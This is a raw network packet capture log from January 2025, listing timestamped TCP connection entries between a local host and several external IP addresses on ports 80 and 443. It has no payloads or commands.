Jan 11, 2025 00:07:32.224752903 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.228420019 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.228535891 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.228607893 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.228646994 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.228811979 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.228825092 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.228868008 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.244467974 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.244543076 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.244591951 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.244640112 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.244687080 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.244743109 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.244767904 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.244924068 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.244978905 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.244992971 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.245076895 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.245131969 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.245138884 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.245184898 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.245192051 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.245223999 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.245232105 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.245361090 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.245366096 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.245400906 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.245697975 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.245747089 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.251368999 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.251427889 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.251463890 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.251526117 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.251559973 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.251616001 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.251648903 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.251703978 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.251770020 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.251872063 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.251888037 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.251931906 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.251941919 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.251990080 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.252007008 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.252057076 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.252512932 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.252569914 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.252608061 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.252664089 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.252701998 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.252958059 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.252966881 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.253011942 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.267467022 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.267553091 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.267618895 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.267735958 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.267750978 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.267802000 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.267824888 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.267884970 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.267951012 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.268009901 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.268060923 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.268131971 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.268157959 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.268291950 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.268306017 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.268362045 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.268377066 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.268428087 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.268440962 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.268527031 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.268556118 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.268608093 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.268620014 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.268671989 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.268682957 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.268807888 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.268848896 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.268871069 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.268896103 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.268939972 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.268951893 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.269010067 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.269351959 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.269411087 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.269458055 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.269515991 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.269555092 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.269623995 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.269649982 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.269718885 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.269740105 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.269793034 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.270164013 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.270224094 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.270291090 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.270350933 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.270427942 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.270493984 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.270524979 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.270596027 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.270642042 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.270751953 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.270765066 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.271105051 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.275021076 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.275084972 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.275113106 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.275163889 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.275163889 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.275177002 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.275238037 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.275254965 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.275341034 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.280576944 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.280639887 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.280643940 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.280654907 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.280694008 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.280730009 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.280740023 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.280754089 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.280795097 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.280821085 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.280917883 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.281021118 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.281099081 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.558367014 CET	49980	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:32.563237906 CET	80	49980	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:32.563328981 CET	49980	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:32.563517094 CET	49980	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:32.568337917 CET	80	49980	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:33.236788034 CET	80	49980	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:33.242609978 CET	49980	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:33.247523069 CET	80	49980	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:33.452517986 CET	80	49980	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:33.507169962 CET	49980	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:33.868262053 CET	49981	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:33.868316889 CET	443	49981	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:33.868400097 CET	49981	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:33.870033979 CET	49981	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:33.870059013 CET	443	49981	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:34.437153101 CET	443	49981	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:34.437861919 CET	49981	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:34.440959930 CET	49981	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:34.440985918 CET	443	49981	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:34.441287994 CET	443	49981	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:34.447325945 CET	49981	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:34.491332054 CET	443	49981	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:34.583650112 CET	443	49981	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:34.583725929 CET	443	49981	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:34.583878994 CET	49981	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:34.589063883 CET	49981	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:34.599915981 CET	49980	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:34.604720116 CET	80	49980	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:34.812510967 CET	80	49980	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:34.816298008 CET	49982	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:34.816334009 CET	443	49982	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:34.817037106 CET	49982	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:34.818777084 CET	49982	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:34.818787098 CET	443	49982	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:34.866831064 CET	49980	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:35.280703068 CET	443	49982	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:35.282444954 CET	49982	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:35.282464981 CET	443	49982	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:35.434015989 CET	443	49982	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:35.434091091 CET	443	49982	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:35.434369087 CET	49982	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:35.434689045 CET	49982	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:35.438250065 CET	49980	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:35.439506054 CET	49983	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:35.443351030 CET	80	49980	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:35.443407059 CET	49980	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:35.447865009 CET	80	49983	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:35.447940111 CET	49983	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:35.448026896 CET	49983	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:35.454443932 CET	80	49983	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:36.149410009 CET	80	49983	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:36.162663937 CET	49984	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:36.162723064 CET	443	49984	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:36.162921906 CET	49984	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:36.163836956 CET	49984	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:36.163858891 CET	443	49984	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:36.194674969 CET	49983	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:36.657865047 CET	443	49984	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:36.659560919 CET	49984	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:36.659594059 CET	443	49984	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:36.802642107 CET	443	49984	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:36.802710056 CET	443	49984	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:36.802772999 CET	49984	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:36.803184032 CET	49984	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:36.807902098 CET	49985	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:36.812726021 CET	80	49985	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:36.812819004 CET	49985	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:36.812865019 CET	49985	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:36.817641973 CET	80	49985	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:37.586335897 CET	80	49985	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:37.587668896 CET	49986	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:37.587750912 CET	443	49986	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:37.588002920 CET	49986	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:37.588253975 CET	49986	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:37.588279963 CET	443	49986	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:37.632194996 CET	49985	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:38.043566942 CET	443	49986	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:38.045717001 CET	49986	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:38.045732021 CET	443	49986	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:38.180402994 CET	443	49986	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:38.180669069 CET	443	49986	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:38.180792093 CET	49986	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:38.181046009 CET	49986	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:38.184293985 CET	49985	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:38.185465097 CET	49987	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:38.189338923 CET	80	49985	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:38.190237045 CET	80	49987	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:38.190417051 CET	49985	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:38.190448999 CET	49987	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:38.190526962 CET	49987	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:38.195287943 CET	80	49987	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:38.880357027 CET	80	49987	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:38.889452934 CET	49988	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:38.889491081 CET	443	49988	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:38.889581919 CET	49988	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:38.889822006 CET	49988	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:38.889836073 CET	443	49988	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:38.929095030 CET	49987	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:39.369357109 CET	443	49988	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:39.371891975 CET	49988	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:39.371942043 CET	443	49988	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:39.500969887 CET	443	49988	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:39.501053095 CET	443	49988	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:39.501104116 CET	49988	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:39.501419067 CET	49988	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:39.505182028 CET	49987	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:39.505997896 CET	49989	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:39.510171890 CET	80	49987	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:39.510222912 CET	49987	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:39.510802984 CET	80	49989	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:39.510886908 CET	49989	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:39.510941982 CET	49989	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:39.515652895 CET	80	49989	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:40.288095951 CET	80	49989	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:40.289623022 CET	49990	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:40.289681911 CET	443	49990	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:40.289772987 CET	49990	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:40.290021896 CET	49990	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:40.290034056 CET	443	49990	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:40.335334063 CET	49989	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:40.749365091 CET	443	49990	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:40.754092932 CET	49990	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:40.754137993 CET	443	49990	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:40.892146111 CET	443	49990	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:40.892239094 CET	443	49990	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:40.892354965 CET	49990	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:40.892878056 CET	49990	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:40.896405935 CET	49989	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:40.897591114 CET	49991	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:40.902457952 CET	80	49989	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:40.902584076 CET	80	49991	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:40.902668953 CET	49989	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:40.902698994 CET	49991	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:40.902813911 CET	49991	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:40.908471107 CET	80	49991	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:41.576138973 CET	80	49991	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:41.632184982 CET	49991	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:41.673233032 CET	49992	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:41.673336983 CET	443	49992	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:41.673479080 CET	49992	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:41.673826933 CET	49992	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:41.673914909 CET	443	49992	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:42.128177881 CET	443	49992	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:42.130343914 CET	49992	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:42.130387068 CET	443	49992	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:42.260466099 CET	443	49992	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:42.260546923 CET	443	49992	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:42.260593891 CET	49992	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:42.261329889 CET	49992	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:42.278774023 CET	49991	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:42.279930115 CET	49993	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:42.283812046 CET	80	49991	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:42.283855915 CET	49991	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:42.284778118 CET	80	49993	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:42.284832001 CET	49993	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:42.284938097 CET	49993	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:42.289683104 CET	80	49993	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:42.972179890 CET	80	49993	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:42.973500967 CET	49994	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:42.973604918 CET	443	49994	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:42.973776102 CET	49994	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:42.973926067 CET	49994	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:42.973948002 CET	443	49994	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:43.022949934 CET	49993	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:43.457911015 CET	443	49994	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:43.459903002 CET	49994	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:43.459955931 CET	443	49994	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:43.610825062 CET	443	49994	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:43.610963106 CET	443	49994	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:43.611085892 CET	49994	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:43.611591101 CET	49994	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:43.614579916 CET	49993	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:43.615081072 CET	49995	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:43.619601965 CET	80	49993	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:43.619694948 CET	49993	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:43.619950056 CET	80	49995	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:43.620035887 CET	49995	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:43.620126009 CET	49995	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:43.624914885 CET	80	49995	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:44.300144911 CET	80	49995	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:44.302175999 CET	49996	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:44.302227974 CET	443	49996	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:44.302464008 CET	49996	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:44.302651882 CET	49996	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:44.302670002 CET	443	49996	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:44.350944996 CET	49995	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:44.781266928 CET	443	49996	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:44.788630962 CET	49996	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:44.788660049 CET	443	49996	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:44.901216030 CET	443	49996	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:44.901384115 CET	443	49996	104.21.16.1	192.168.2.10
Jan 11, 2025 00:07:44.901454926 CET	49996	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:44.901870012 CET	49996	443	192.168.2.10	104.21.16.1
Jan 11, 2025 00:07:45.024053097 CET	49995	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:45.029225111 CET	80	49995	132.226.247.73	192.168.2.10
Jan 11, 2025 00:07:45.029297113 CET	49995	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:07:45.031558990 CET	49997	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:07:45.031589031 CET	443	49997	149.154.167.220	192.168.2.10
Jan 11, 2025 00:07:45.031651974 CET	49997	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:07:45.032367945 CET	49997	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:07:45.032382965 CET	443	49997	149.154.167.220	192.168.2.10
Jan 11, 2025 00:07:45.674736023 CET	443	49997	149.154.167.220	192.168.2.10
Jan 11, 2025 00:07:45.674905062 CET	49997	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:07:45.676945925 CET	49997	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:07:45.676976919 CET	443	49997	149.154.167.220	192.168.2.10
Jan 11, 2025 00:07:45.677251101 CET	443	49997	149.154.167.220	192.168.2.10
Jan 11, 2025 00:07:45.678643942 CET	49997	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:07:45.719327927 CET	443	49997	149.154.167.220	192.168.2.10
Jan 11, 2025 00:07:45.916249037 CET	443	49997	149.154.167.220	192.168.2.10
Jan 11, 2025 00:07:45.916333914 CET	443	49997	149.154.167.220	192.168.2.10
